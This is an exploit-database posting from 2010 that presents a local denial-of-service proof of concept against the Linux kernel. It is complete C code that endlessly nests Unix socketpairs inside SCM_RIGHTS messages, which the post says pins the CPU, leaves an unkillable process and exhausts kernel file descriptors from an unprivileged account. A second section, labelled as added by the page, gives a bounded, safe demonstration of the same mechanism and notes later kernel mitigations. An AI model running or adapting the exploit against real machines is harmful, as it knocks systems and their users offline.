[dos / poc] - Linux Kernel Unix Sockets Local Denial of Service
Posted on 27 November 2010
=================================================
Linux Kernel Unix Sockets Local Denial of Service
=================================================

Simple kernel attack using socketpair. Easy, 100% reproducible, works from an unprivileged guest account. No way to protect :(

See source attached. The process ends up in state 'Running' but is not killable via kill -KILL; it eats 100% CPU and eats all available internal file descriptors in the kernel :(

Each loop iteration creates a fresh socketpair, passes both ends of the previous pair into it as SCM_RIGHTS ancillary data, and then closes the local references. Every generation is therefore kept alive only by the in-flight message queued in the next one, the chain of in-flight sockets grows without bound, and the kernel's AF_UNIX garbage collector, which runs on close() and walks all in-flight sockets, does more work on every iteration.

-- Segmentation fault

#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>

/* Pass descriptor fd over the Unix socket unix_fd as SCM_RIGHTS ancillary
 * data. No payload is attached: on SOCK_SEQPACKET the kernel still queues
 * an (empty) skb carrying the descriptor. */
static int send_fd (int unix_fd, int fd)
{
    struct msghdr msgh;
    struct cmsghdr *cmsg;
    char buf[CMSG_SPACE (sizeof (fd))];

    memset (&msgh, 0, sizeof (msgh));
    memset (buf, 0, sizeof (buf));
    msgh.msg_control = buf;
    msgh.msg_controllen = sizeof (buf);
    cmsg = CMSG_FIRSTHDR (&msgh);
    cmsg->cmsg_len = CMSG_LEN (sizeof (fd));
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    msgh.msg_controllen = cmsg->cmsg_len;
    memcpy (CMSG_DATA (cmsg), &fd, sizeof (fd));
    return sendmsg (unix_fd, &msgh, 0);
}

int main (void)
{
    int fd[2], ff[2];

    if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, fd) == -1)
        return 1;
    for (;;) {
        /* New pair ff; park both ends of the previous pair fd inside it,
         * then drop the local references. fd now lives only in ff's queue. */
        if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff) == -1)
            return 2;
        send_fd (ff[0], fd[0]);
        send_fd (ff[0], fd[1]);
        close (fd[1]);
        close (fd[0]);
        fd[0] = ff[0];
        fd[1] = ff[1];
    }
}

# 1337db.com [2010-11-27]
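The following is an added example written for this page; it is not part of the original posting and not the author's exploit. It shows, with a bounded send/receive pair, the property the PoC relies on: a socketpair whose descriptors have all been closed locally stays alive as long as an SCM_RIGHTS message referencing it sits in another socket's receive queue, and the descriptors can be recovered from that queue and used. Unlike the PoC it builds only one level of nesting and unwinds it, so it is safe to run. The helper names unix_send_fd, unix_recv_fd and inflight_keeps_socket_alive are this example's own, and the one-byte payload is an assumption made so the same helpers also work on SOCK_STREAM, where a zero-length sendmsg transfers nothing.

```c
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <sys/un.h>
#include <unistd.h>

/* Send one descriptor over a Unix socket as SCM_RIGHTS ancillary data.
 * The union keeps the control buffer correctly aligned for cmsghdr. */
static int unix_send_fd(int sock, int fd)
{
    char payload = 'F';
    struct iovec iov = { .iov_base = &payload, .iov_len = 1 };
    union { struct cmsghdr hdr; char buf[CMSG_SPACE(sizeof(int))]; } u;
    struct msghdr msg;

    memset(&msg, 0, sizeof msg);
    memset(&u, 0, sizeof u);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = u.buf;
    msg.msg_controllen = sizeof u.buf;

    struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
    c->cmsg_level = SOL_SOCKET;
    c->cmsg_type = SCM_RIGHTS;
    c->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(c), &fd, sizeof(int));

    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive one descriptor; returns the new local fd, or -1 on error.
 * MSG_CMSG_CLOEXEC makes the installed descriptor close-on-exec, and a
 * truncated control message (MSG_CTRUNC) is treated as failure because the
 * kernel may already have installed descriptors we never got to see. */
static int unix_recv_fd(int sock)
{
    char payload;
    struct iovec iov = { .iov_base = &payload, .iov_len = 1 };
    union { struct cmsghdr hdr; char buf[CMSG_SPACE(sizeof(int))]; } u;
    struct msghdr msg;

    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = u.buf;
    msg.msg_controllen = sizeof u.buf;

    if (recvmsg(sock, &msg, MSG_CMSG_CLOEXEC) < 0)
        return -1;
    if (msg.msg_flags & MSG_CTRUNC)
        return -1;
    struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
    if (c == NULL || c->cmsg_level != SOL_SOCKET || c->cmsg_type != SCM_RIGHTS
        || c->cmsg_len != CMSG_LEN(sizeof(int)))
        return -1;
    int fd;
    memcpy(&fd, CMSG_DATA(c), sizeof(int));
    return fd;
}

/* Returns 1 if a socketpair whose ends were both closed locally is still
 * usable after being recovered from an in-flight SCM_RIGHTS message,
 * 0 if it is dead, -1 on a setup error. */
int inflight_keeps_socket_alive(void)
{
    int inner[2], carrier[2];
    if (socketpair(AF_UNIX, SOCK_SEQPACKET, 0, inner) == -1) return -1;
    if (socketpair(AF_UNIX, SOCK_SEQPACKET, 0, carrier) == -1) return -1;

    /* Park both ends of 'inner' in carrier[0]'s queue, then drop our own
     * references: the queued skb is now the only thing keeping 'inner'
     * alive, which is the situation the PoC builds thousands of levels deep. */
    if (unix_send_fd(carrier[0], inner[0]) || unix_send_fd(carrier[0], inner[1]))
        return -1;
    close(inner[0]);
    close(inner[1]);

    int a = unix_recv_fd(carrier[1]);
    int b = unix_recv_fd(carrier[1]);
    if (a < 0 || b < 0) return -1;

    /* Had the sockets been freed, this write would fail with EPIPE/ENOTCONN. */
    char out = 'x', in = 0;
    int alive = write(a, &out, 1) == 1 && read(b, &in, 1) == 1 && in == 'x';

    close(a); close(b); close(carrier[0]); close(carrier[1]);
    return alive;
}

int main(void)
{
    int r = inflight_keeps_socket_alive();
    printf("in-flight sockets still alive after local close: %s\n",
           r == 1 ? "yes" : r == 0 ? "no" : "error");
    return r == 1 ? 0 : 1;
}
```

Because the recovered descriptors are closed at the end, the garbage collector has nothing unreachable to reclaim here; the PoC differs only in never receiving, so the queued references are unreachable from userspace and pile up. Kernels released after this posting bound the number of in-flight AF_UNIX descriptors and force a collection pass when the bound is reached, which throttles the loop rather than letting it run away.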